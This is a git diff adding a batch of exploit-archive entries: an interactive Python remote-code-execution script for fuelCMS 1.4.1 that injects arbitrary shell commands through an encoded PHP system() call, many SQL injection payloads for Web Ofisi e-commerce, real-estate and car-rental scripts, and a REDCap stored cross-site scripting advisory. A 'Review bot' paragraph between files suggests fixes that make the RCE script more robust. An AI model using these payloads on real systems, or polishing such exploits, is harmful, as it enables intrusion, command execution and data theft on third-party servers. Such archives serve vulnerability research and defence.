diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py
new file mode 100755
index 000000000..971baab76
--- /dev/null
+++ b/exploits/linux/webapps/47138.py
@@ -0,0 +1,34 @@
+# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
+# Date: 2019-07-19
+# Exploit Author: 0xd0ff9
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
+# Version: <= 1.4.1
+# Tested on: Ubuntu - Apache2 - php5
+# CVE : CVE-2018-16763
+
+
+import requests
+import urllib
+
+url = "http://127.0.0.1:8881"
+def find_nth_overlapping(haystack, needle, n):
+ start = haystack.find(needle)
+ while start >= 0 and n > 1:
+ start = haystack.find(needle, start+1)
+ n -= 1
+ return start
+
+while 1:
+ xxxx = raw_input('cmd:')
+ burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
+ proxy = {"http":"http://127.0.0.1:8080"}
+ r = requests.get(burp0_url, proxies=proxy)
+
+ html = ""
+ htmlcharset = r.text.find(html)
+
+ begin = r.text[0:20]
+ dup = find_nth_overlapping(r.text,begin,2)
+
+ print r.text[0:dup]
\ No newline at end of file
diff --git a/exploits/linux/webapps/47139.txt b/exploits/linux/webapps/47139.txt
new file mode 100644
index 000000000..b8d7f16b9
--- /dev/null
+++ b/exploits/linux/webapps/47139.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html
+# Demo Site: http://demobul.net/eticaretv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?a=
+Vulnerable Parameter: a (GET)
+Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf%
\ No newline at end of file
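Review bot: The script is Python 2 only — `raw_input`, `urllib.quote` and the `print r.text[0:dup]` statement all fail under Python 3 — yet the header documents only the target stack, so the `# Tested on:` line should also name the interpreter, e.g. `# Tested on: Ubuntu - Apache2 - php5 (Python 2 script)`. `htmlcharset = r.text.find(html)` is assigned and never read, and `html` is an empty string as shown here, so both of those lines are dead code. `find_nth_overlapping` returns -1 when a second occurrence of `begin` is absent, and `r.text[0:dup]` then silently drops the last character of the response instead of printing it whole; a guard such as `dup = len(r.text) if dup < 0 else dup` before the print makes that case explicit. The request also hard-codes `proxies={"http":"http://127.0.0.1:8080"}` with no `timeout`, so the loop stops with a ConnectionError unless a listener is bound there and can hang indefinitely on a stalled reply — both facts belong in a comment on the `proxy` line.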
diff --git a/exploits/linux/webapps/47140.txt b/exploits/linux/webapps/47140.txt
new file mode 100644
index 000000000..57c3fdb22
--- /dev/null
+++ b/exploits/linux/webapps/47140.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html
+# Demo Site: http://demobul.net/eticaretv5/
+# Version: v5
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request: http://localhost/[PATH]/arama?kategori=&q=
+Vulnerable Parameter: q (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 2: SQLi -----
+
+Request: http://localhost/[PATH]/ajax/productsFilterSearch
+Vulnerable Parameter: q (POST)
+Payload:
+kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1
\ No newline at end of file
diff --git a/exploits/linux/webapps/47141.txt b/exploits/linux/webapps/47141.txt
new file mode 100644
index 000000000..d3bf8ec78
--- /dev/null
+++ b/exploits/linux/webapps/47141.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html
+# Demo Site: http://demobul.net/emlakv2/
+# Version: v2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request: http://localhost/[PATH]/ara.html?ara=
+Vulnerable Parameter: ara (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47142.txt b/exploits/linux/webapps/47142.txt
new file mode 100644
index 000000000..d238692fb
--- /dev/null
+++ b/exploits/linux/webapps/47142.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html
+# Demo Site: http://demobul.net/emlakv3/
+# Version: V2
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_durumu (GET)
+Payload: -1' OR 3*2*1=6 AND 000744=000744 --
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: emlak_tipi (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: il (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: ilce (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: kelime (GET)
+Payload: -1' OR 3*2*1=6 AND 000397=000397 --
+
+----- PoC 6: SQLi -----
+
+Request:
+http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet
+Vulnerable Parameter: semt (GET)
+Payload: -1' OR 3*2*1=6 AND 000531=000531 --
\ No newline at end of file
diff --git a/exploits/linux/webapps/47143.txt b/exploits/linux/webapps/47143.txt
new file mode 100644
index 000000000..c166342a0
--- /dev/null
+++ b/exploits/linux/webapps/47143.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html
+# Demo Site: http://demobul.net/firma-rehberi-v1/
+# Version: v1
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+
+Request:
+http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni
+Vulnerable Parameters: il,kelime,kat (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/linux/webapps/47144.txt b/exploits/linux/webapps/47144.txt
new file mode 100644
index 000000000..b0f169f23
--- /dev/null
+++ b/exploits/linux/webapps/47144.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html
+# Demo Site: http://demobul.net/rentacarv3/
+# Version: v3
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC 1: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: kategori[] (GET)
+Payload: if(now()=sysdate(),sleep(0),0)
+
+----- PoC 2: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: klima[] (GET)
+Payload: 1 AND 3*2*1=6 AND 695=695
+
+----- PoC 3: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 4: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: vites[] (GET)
+Payload: 1 AND 3*2*1=6 AND 499=499
+
+----- PoC 5: SQLi -----
+
+Request:
+http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1
+Vulnerable Parameter: yakit[] (GET)
+Payload: 1 AND 3*2*1=6 AND 602=602
\ No newline at end of file
diff --git a/exploits/linux/webapps/47145.txt b/exploits/linux/webapps/47145.txt
new file mode 100644
index 000000000..b6da6ab60
--- /dev/null
+++ b/exploits/linux/webapps/47145.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection
+# Date: 2019-07-19
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html
+# Demo Site: http://demobul.net/firmav13/
+# Version: v13
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC: SQLi -----
+Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1
+Vulnerable Parameters: oz[] (GET)
+Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
\ No newline at end of file
diff --git a/exploits/php/webapps/47146.txt b/exploits/php/webapps/47146.txt
new file mode 100644
index 000000000..987fbb85b
--- /dev/null
+++ b/exploits/php/webapps/47146.txt
@@ -0,0 +1,60 @@
+# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting
+# Date: 2019-07-19
+# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
+# Vendor Homepage: https://projectredcap.org
+# Software Link: https://projectredcap.org
+# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2
+# Tested on: 9.1.0
+# CVE: CVE-2019-13029
+# Security advisory: https://gitlab.com/snippets/1874216
+
+### Stored XSS n°1 – Project name (found by Dylan GARNAUD)
+
+Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it.
+
+- Where? In project name
+- Payload: `
` +- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages. +- Privileges: It requires admin privileges to store it. +- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified + +### Stored XSS n°2 – Calendar (found by Dylan GARNAUD) + +- Where? Calendar event +- Payload: `` +- Privileges: It requires admin privileges to store it. +- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12 + +### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD) + +- Where? Wherever there is a CSV upload feature with displayed parsed results +- Payload: + ```csv + record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete + ,, + ``` +- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered. +- Privileges: It requires admin privileges to store it. +- URL examples of execution: + + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index + + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16 + +### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI) + +- Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue) +- Payload: `